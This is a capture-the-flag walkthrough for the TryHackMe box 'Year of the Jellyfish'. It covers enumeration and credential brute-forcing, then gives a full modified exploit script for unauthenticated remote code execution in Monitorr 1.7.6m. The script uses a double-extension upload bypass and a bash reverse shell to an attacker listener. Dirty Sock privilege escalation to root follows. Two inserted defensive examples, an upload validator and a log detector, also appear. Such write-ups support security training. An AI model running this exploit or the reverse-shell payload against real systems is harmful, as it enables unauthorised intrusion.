# Year of the Jellyfish

## SYNOPSIS

[Year of the Jellyfish](https://tryhackme.com/room/yearofthejellyfish) is a hard box based on a real-world challenge, and good practice for OSCP preparation. Enumeration turns up subdomains, the Monitorr 1.7.6m RCE exploit gives us a foothold on the box, and privilege escalation with the Dirty Sock version-2 exploit gets us root. Also worth mentioning: this box runs on a public IP and is also connected to the [TryHackMe](https://tryhackme.com) network.

## ENUMERATION

**Starting with Nmap:** scan every port, then run a second command to learn more about the services running on the open ports.

```
nmap -p- -vv <MACHINE-IP> 
```

![Ports open on Machine-IP](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZW84URGroGfe-sKJcV%2F-MZW8tWXOrGaX22TDQuq%2Fimage.png?alt=media\&token=9f2385b7-f765-4174-a750-3e454d3167df)

With that output in hand, run the following command to learn more about the services on all of the above ports.

```
nmap -sC -sV -p 21,22,80,443,554,1723,8000,8096,22222 <MACHINE-IP>
```

The output is long, so instead of pasting the screenshot, here are the key points:

* FTP is running on port 21, but there is not enough information to get in.
* SSH is running on two ports: 22 and 22222.
* A web server is running on four ports: 80, 443, 8000 and 8096.
* Looking closer at the port 443 output shows the following subdomains:
  * *monitorr.robyns-petshop.thm*
  * *beta.robyns-petshop.thm*
  * *dev.robyns-petshop.thm*

Now that we have an overview of what is running on the host, let's go deeper and start enumerating the web servers. Before that, add the IP with the domain and subdomains to `/etc/hosts`. To understand why this is needed, see this [article](https://www.cloudflare.com/en-gb/learning/dns/what-is-dns/).

Starting with **root domain enumeration**: `robyns-petshop.thm`. You'll notice that the browser asks you to accept the self-signed certificate, and after doing so you will see the front page below.

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbg_6vPDUANj--YFQ4%2Fimage.png?alt=media\&token=0e045de0-24ed-49ed-bba4-a74f0aa1e8c8)

Nothing special there; started **ffuf** with the following command to brute-force directories and got the following results:

```
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u https://robyns-petshop.thm/FUZZ
```

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbirQLkJPzQDJ1p8Oz%2Fimage.png?alt=media\&token=05bb1d04-16b6-425f-a2fc-b81fb58cca79)

Went through each and every one of them and found nothing special. Moving on to what the subdomains have to offer: `beta.robyns-petshop.thm` and `dev.robyns-petshop.thm` showed the same thing, that the site is **Under Construction**.

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbk85qsBNUl68KowTZ%2Fimage.png?alt=media\&token=bfdaf498-5ed4-408d-9c10-d3aa9b57e28c)

The *ID\_HERE* parameter looked fishy, so made a wordlist of numbers using **Crunch** with the following command to brute-force it.

```
crunch 4 4 -t %%%% -o numb
```

This made a wordlist of numbers from `0000` to `9999`. But again no luck with any information; tried this on both subdomains, *dev* and *beta*.

Also, before moving to the last subdomain: there was another service running on port **8096** of the **root domain**, named **Jellyfin**, as you can see in the image below. This had a login portal, so fired up Hydra and started brute-forcing the credentials, but no luck with that either.

![http://robyns-petshop.thm:8096](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZborl_Vd2cnie_QioU%2Fimage.png?alt=media\&token=e4feabe4-217e-4ad9-a6aa-b8fc5869c41b)

Now we are left with our last subdomain: `monitorr.robyns-petshop.thm`, and this looked interesting as it is **open-source** (it has a [GitHub repo](https://github.com/monitorr/Monitorr)), **version 1.7.6** was mentioned at the bottom of the page, and it had a **login portal** too. For the login portal, *username: admin* was the default one, so again used Hydra to brute-force with the admin username, but no luck.

![https://monitorr.robyns-petshop.thm](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbpU5tgmYNfDjmZpH7%2Fimage.png?alt=media\&token=7c0932b6-3477-4291-b83f-323fcd036d47)

![https://monitorr.robyns-petshop.thm/settings.php](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbQdE-5tMkKJ4YGyZF%2F-MZbq0fFDMVrUX9wW0-E%2Fimage.png?alt=media\&token=cd849c79-1db8-4b15-a856-b0f1512727f9)

**Using Searchsploit** to check whether there is any exploit available for this Monitorr version, and got the following results:

![Searchsploit Result](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZbsXBN1tukk46NCY4o%2F-MZc5n804ArLME_xx_Gr%2Fimage.png?alt=media\&token=3ba24a00-7a80-4577-b25d-19f9aa0ee03c)

## INITIAL FOOTHOLD

Looking into the first exploit, [Authorization Bypass](https://www.exploit-db.com/exploits/48981), which "*allows creation of administrative accounts by abusing the installation URL*": this exploit makes a POST request to the path `/assets/config/installation/_register.php?action=register` to create a new user. Requesting this path on the Monitorr domain gives a **404 Not Found**, hence this exploit won't work!

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZkeLHPY9OPsSlGN4Fx%2F-MZkhmzAENSuMAmNmE9r%2Fimage.png?alt=media\&token=534e933c-daba-486d-b99c-da481d9bf8a2)

Moving to the second exploit, [Remote Code Execution (Unauthenticated)](https://www.exploit-db.com/exploits/48980), I tried the exploit directly and it gave error after error; the main thing it showed was that certificate verification failed, so searched the internet and found that adding `verify=False` to the code skips the verification and lets the script continue.

![Error](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZkeLHPY9OPsSlGN4Fx%2F-MZl0e4PWww41vrmEz49%2Fimage.png?alt=media\&token=1c63520a-f449-477f-8903-7a216cf8cbe8)

Tried the exploit again and it still didn't work. Looking at the code, `requests.post` sends the POST request to the server, so to check the response, printed it out.

```
print(requests.post(url, headers=headers, data=data, verify=False).text)
```

Now, running the exploit again gives the following error:

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlfSYcUC_IPRgE00sd%2F-MZlfdcvn-UYCTAeTLSR%2Fimage.png?alt=media\&token=6dff4f00-7212-42f7-ae59-194deee51815)

After a while, found a cookie in the browser via developer tools: **isHuman with value 1**. Added the cookie to the code and ran the script; same error again, so maybe there is a filter on uploaded file names. Then messed around with file names using the [HackTricks article](https://book.hacktricks.xyz/pentesting-web/file-upload) and finally got a file upload bypass: **shell.jpeg.Php**
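To see why a double extension like this gets through, here is an added example (not part of the original walkthrough, and not Monitorr's own code) that puts an assumed case-sensitive blacklist filter beside an allowlist check that inspects every extension case-insensitively, compares the magic bytes with the claimed type, and rejects script markers in the body. The sample file name and body are constructed from the request described above.

```python
import re
import secrets

# Constructed sample, mirroring the request in the walkthrough: a double extension with
# mixed case and a GIF header in front of PHP text (the PHP part is an inert stub here).
SAMPLE_NAME = "shell.jpeg.Php"
SAMPLE_BODY = b"GIF89a213213123<?php /* stub */ ?>"

ALLOWED = {"jpg", "jpeg", "png", "gif"}
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png", b"GIF8": "gif"}
SCRIPT_EXT = re.compile(r"^ph(p\d?|tml|ar|ps)$")


def weak_check(name):
    """Assumed weak filter (not Monitorr's real code): blacklist only a literal
    trailing '.php'. 'shell.jpeg.Php' passes because the comparison is case-sensitive."""
    return not name.endswith(".php")


def strong_check(name, body):
    """Allowlist check: every extension in the name is inspected case-insensitively,
    exactly one extension is allowed, the magic bytes must agree with it, and script
    markers in the body are rejected. Returns (accepted, reason)."""
    parts = name.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False, "malformed name"
    exts = parts[1:]
    if any(SCRIPT_EXT.match(e) for e in exts):
        return False, "script extension in name"
    if len(exts) != 1 or exts[0] not in ALLOWED:
        return False, "extension not allowed"
    claimed = "jpg" if exts[0] == "jpeg" else exts[0]
    detected = next((kind for magic, kind in MAGIC.items() if body.startswith(magic)), None)
    if detected != claimed:
        return False, "magic bytes do not match extension"
    if b"<?" in body:  # catches the GIF89a-prefixed PHP trick even with a clean name
        return False, "script marker in body"
    return True, "ok"


def stored_name(name):
    """Never keep the client's file name: random basename plus the single allowlisted extension."""
    return secrets.token_hex(8) + "." + name.lower().rsplit(".", 1)[-1]
```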

*And here's how the code looks after making all the changes to the original exploit:*

```
#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19
#
# Changes made for this box, compared with the exploit-db version:
#   - verify=False on both requests, because the site uses a self-signed certificate
#   - the isHuman=1 cookie copied from the browser
#   - upload file name shell.jpeg.Php, which gets past the upload filter
#   - the upload response is printed so failures can be seen

import requests
import sys

if len(sys.argv) != 4:
    print("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
    sys.exit(1)

target, lhost, lport = sys.argv[1], sys.argv[2], sys.argv[3]
cookies = {"isHuman": "1"}
boundary = "---------------------------31046105003900160576454225745"

# Step 1: upload the PHP file through the unauthenticated upload handler.
url = target + "/assets/php/upload.php"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",
    "Accept": "text/plain, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "multipart/form-data; boundary=" + boundary,
    "Origin": target,
    "Connection": "close",
    "Referer": target,
}
data = (
    "--" + boundary + "\r\n"
    "Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"shell.jpeg.Php\"\r\n"
    "Content-Type: image/gif\r\n\r\n"
    "GIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1'\");\r\n\r\n"
    "--" + boundary + "--\r\n"
)
print(requests.post(url, headers=headers, data=data, verify=False, cookies=cookies).text)

# Step 2: request the uploaded file so the web server executes it.
print("A shell script should be uploaded. Now we try to execute it")
url = target + "/assets/data/usrimg/shell.jpeg.Php"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}
requests.get(url, headers=headers, verify=False, cookies=cookies)
```

Before running the script, start the nc listener on port 443 with sudo. Why port 443? Because there might be a firewall on other ports; I also tried other ports and it didn't work. And *ports below **1024** need **sudo** permissions.*

![Got the reverse shell :)](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlfSYcUC_IPRgE00sd%2F-MZlrGUVtAUEVFIwhQ5u%2Fimage.png?alt=media\&token=4346a305-06df-4306-8507-fd157c488098)
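From the defender's side, an upload followed by a fetch of a script-named file from the image directory is a recognizable pair in the web server's access log. The following is an added example, not part of the original walkthrough, that flags that pattern over constructed Apache-style log lines; the two paths are the ones the exploit script requests, while the IPs and timestamps are made up.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-format lines (made up for this example; the two Monitorr
# paths are the ones the exploit script requests).
LOG_LINES = """\
10.0.0.5 - - [12/Apr/2021:10:14:02 +0000] "GET /index.php HTTP/1.1" 200 4211
10.0.0.9 - - [12/Apr/2021:10:14:10 +0000] "POST /assets/php/upload.php HTTP/1.1" 200 93
10.0.0.9 - - [12/Apr/2021:10:14:11 +0000] "GET /assets/data/usrimg/shell.jpeg.Php HTTP/1.1" 200 0
10.0.0.5 - - [12/Apr/2021:10:20:00 +0000] "POST /assets/php/upload.php HTTP/1.1" 200 93
10.0.0.5 - - [12/Apr/2021:10:20:01 +0000] "GET /assets/data/usrimg/avatar.png HTTP/1.1" 200 5120
""".splitlines()

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*"')
UPLOAD_HANDLER = "/assets/php/upload.php"
UPLOAD_DIR = "/assets/data/usrimg/"
# Case-insensitive so that 'shell.jpeg.Php' is matched just like 'shell.php'.
SCRIPT_EXT = re.compile(r"\.ph(p\d?|tml|ar|ps)(?:\W|$)", re.IGNORECASE)
WINDOW = timedelta(minutes=5)


def parse(line):
    """Return (ip, timestamp, method, path), or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path


def find_upload_then_execute(lines):
    """Flag every fetch of a script-named file under the upload directory that follows
    a POST to the upload handler from the same client within WINDOW."""
    last_upload = {}
    hits = []
    for rec in filter(None, map(parse, lines)):
        ip, when, method, path = rec
        if method == "POST" and path.split("?")[0] == UPLOAD_HANDLER:
            last_upload[ip] = when
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            if ip in last_upload and when - last_upload[ip] <= WINDOW:
                hits.append((ip, path))
    return hits
```

The image upload from 10.0.0.5 is not flagged because `avatar.png` has no script extension; a stricter variant would alert on any file with a script extension under the upload directory regardless of timing.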

First thing to do after getting reverse shell is to stabilize the shell. Using the following commands:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# now press Ctrl+Z to background the shell, then in the local terminal:
stty raw -echo; fg
```

### ***The first flag is in the /var/www directory, named flag1.txt***

## PRIVILEGE ESCALATION

For privilege escalation, started with [linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh), but it really didn't show any good results; then used [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh), and it showed the following results:

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm-636FgQgtt0Ds-wv%2Fimage.png?alt=media\&token=e193082c-eaa1-4651-a1c0-72e9cb12335d)

Looking at the snap version, it looks vulnerable to Dirty Sock; let's download the [zip](https://github.com/initstring/dirty_sock/archive/master.zip) to the local machine and wget it onto the compromised machine!

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm-cLToQeYAnbQ0nen%2Fimage.png?alt=media\&token=cf125ac5-2148-4aa1-b523-a1f645458973)

It has two versions; tried the first one and it gave an error, then tried the second one, and here's what I got: it created the user dirty\_sock, which has root permissions! Then switched **user to dirty\_sock** with the **password: dirty\_sock**.

![](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm72UvfBckgIglocsL%2Fimage.png?alt=media\&token=02de0231-51a3-45c1-9dd4-2605c459d3ec)

Then run **sudo su** with the password dirty\_sock, and we are root! <3

![Got the root :) ](https://1472560041-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZXGVVVu8PUiVdXVQog%2F-MZlskF0xuDcoDmApDR9%2F-MZm8DNEbcJ3qm4-FzzX%2Fimage.png?alt=media\&token=84217fa3-d2e9-44f1-bd6e-962611162706)

### **Thank you for reading the walkthrough, I hope it helped you somehow! :)**

**For any queries, contact me here:** [Twitter](https://twitter.com/th3lazykid) **or on Discord**: **Th3lazykid#8871**.
